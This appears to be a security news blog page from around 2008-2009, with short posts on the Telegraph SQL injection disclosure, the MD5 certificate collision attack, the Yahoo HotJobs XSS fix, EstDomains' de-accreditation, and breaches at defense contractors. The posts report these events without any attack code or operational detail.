The Romanian group, HackersBlog, has struck again and this time it is not an infosec firm. It is the website of the highest selling national daily newspaper of the United Kingdom, The Daily Telegraph.

The Property section of the website suffered a serious SQL injection vulnerability which was disclosed by the group. The affected section of the website is currently offline:

Figure 1: Telegraph.co.uk's Properties section was taken offline after the compromise

(more…)

Oracle is to release a patch tomorrow that fixes 41 security vulnerabilities across hundreds of its products. According to the announcement, the affected supported products are:

This release dwarfs Microsoft’s one-patch fix that affects Windows 2000, Windows XP, Windows Server 2003, Windows Vista and Windows Server 2008.

A team of researchers presenting yesterday at the 25th Annual Chaos Communication Congress held in Berlin,  have successfully demonstrated an attack against X.509 digital certificates signed by a trusted Certification Authority (CA) using the MD5 hashing algorithm. The attack method makes use of MD5 collision techniques which were known to exist since 2004 but demonstrated in practice for the first time.

Read more about the details here.

The discovery, however, does not post a serious security risk as the technique has not been disclosed. Furthermore, most CAs are already using at least SHA-1 for the hashing function instead of MD5. The slow mover, VeriSign, acknowledged the attack today and confirms that all certificates issued are not vulnerable to the new attack.

If you are still paranoid, get hold of an Extended Validation Certificate.

Happy New Year 2009!

(more…)

Microsoft’s Windows Live OneCare service never really received good reviews despite being one of the first entrants in to the retail Windows PC security marketplace with a all-in-one solution. Why not? Many reasons but primarily because it relies on products that are already available for free and does not work well with third-party programs.

Things could change for Microsoft with the introduction of “Morro” – a free solution that Microsoft describes as “comprehensive protection from malware including viruses, spyware, rootkits and trojans…will be architected for a smaller footprint that will use fewer computing resources, making it ideal for low-bandwidth scenarios or less powerful PCs”. “Morro” would be available in the second half of 2009; Windows Live OneCare subscription service will be discontinued effective June 30, 2009.

According to Microsoft’s official press release:

“Customers around the world have told us that they need comprehensive, ongoing protection from new and existing threats, and we take that concern seriously,” said Amy Barzdukas, senior director of product management for the Online Services and Windows Division at Microsoft. “This new, no-cost offering will give us the ability to protect an even greater number of consumers, especially in markets where the growth of new PC purchases is outpaced only by the growth of malware.”

It would be interesting to see how Symantec and McAfee respond to this move by Microsoft.

The Internet Corporation for Assigned Names and Numbers (ICANN) has terminated its Registrar Accreditation Agreement (RAA) with EstDomains.com after the President of the company was convicted for credit card fraud, money laundering and document forgery.

This comes as welcome news by the cyber security community as EstDomains.com has been used by cyber criminals for years to hide their identities and conduct various malicious activities such as using domains for bot command & control servers, drive-by downloads as well as spamming.

Here are some links of interest that provide more information on this story:

1. F-Secure Weblog - “Case EstDomains” 
2. The Washington Post Company – “ICANN De-Accredits EstDomains for CEO’s Fraud Convictions”
3. Notice sent to EstDomains.com by ICANN (pdf)

Yahoo! has fixed a cross-site scripting vulnerability affecting the HotJobs website. The vulnerability, first reported by Netcraft allowed injection of malicious code that stole session authentication cookie of Yahoo! users and submitting them to a US-based webserver. Yahoo!’s statement found on Netcraft states:

The team was made aware of this particular Cross-Site Scripting issue yesterday morning (Sunday, Oct. 26) and a fix was deployed within a matter of hours. Yahoo! appreciates Netcraft’s assistance in identifying this issue.

As a safety precaution, we recommend users change their passwords, should they still be concerned. Users should always verify via their Sign-in Seal that they are giving their passwords to Yahoo.com.

The session authentication cookies could have been used for accessing Yahoo! services such as Yahoo! Mail and Yahoo! HotJobs amongst others.

A special task force has been setup by the US Army to combat theft of sensitive military information stored on computer systems of private-sector contractors. The task force, Defense Industrial Base Cyber-Security Task Force, came in to being earlier this year without much noise.

According to an army document produced in August this year for the Pentagon’s Department for Acquisition, Technology and Logistics and first reported last week by Inside Defense:

“Exfiltrations of unclassified data from [military contractor computer] systems have occurred and continue to occur, potentially undermining and even neutralizing the technological advantage and combat effectiveness of the future force,”

“Current … efforts largely focus on mitigating risks of compromise to war-fighting technologies as a result of traditional espionage or industrial theft,”

“hostile actors can exfiltrate large volumes of unclassified program information in a single attack that can potentially net enough information to enable adversaries to narrow a capability gap.”

Sure this initiative will bear fruit but I think more needs to be done within the Government security departments to combat potential cyber security threats. Only this week I saw Airport Security personnel hooked up on MSN.com at the Chicago O’Hare International Airport on a light day. Open Internet is a risky area for airport security personnel don’t you think?

More on the story here

CNN is reporting that the Ministry of Defense of the UK has lost track of a portable hard drive which according to a tabloid carries information on some 100,000 British military personnel and 600,000 potential recruits.

One can only wonder whether the information on the hard drive was encrypted or not…

South Korea’s major newspaper, The Chosun Ilbo (Korean Daily News), is reporting that two of the country’s top defense equipment manufacturers, LIGNex1 and Hyundai Heavy Industries found malicious code on its computer systems designed to steal information.

According to the report:

LIGNex1 develops and manufactures Hyunmoo surface-to-surface missile, Haeseong ship-to-ship missile and Shingung portable ground-to-air weapons. Hyundai Heavy Industries manufactures Haeseong, the nation’s first Aegis ship, plus destroyers and submarines for the Navy. Although the development costs of such high-tech weapons are kept secret, the construction of the King Sejong the Great-class destroyer is said to cost over W1 trillion (US$1=W1,165) and development of Haeseong ship-to-ship missile W100 billion with each missile at approximately W2 billion.

The National Security Research Institute, which is affiliated with the Electronics and Telecommunications Research Institute, believes hackers have planted vicious codes through which they stolen information. “The research institute suspects the culprits are Chinese or North Korean hackers but doesn’t know specifically what information they stole,” Kim said. “In the worst case, the blueprints of missiles and Aegis ship could have been stolen.”

DarkMarket.ws, the online forum better known as the biggest hacker market for trading stolen online identities, credit card information, ATM skimmers, and a host of other related items – is shutting down Oct 4 according to a notice posted on the forum by one of the forum administrators, Splyntr.

The shut down plan follows arrest of one of its administrators, Cha0 (Cagatay Evyapan), by Turkish police earlier this month.

The whole story is covered in great detail this story on Wired’s Blog, Threat Level.  So, what’ next after DarkMarket.ws?

(more…)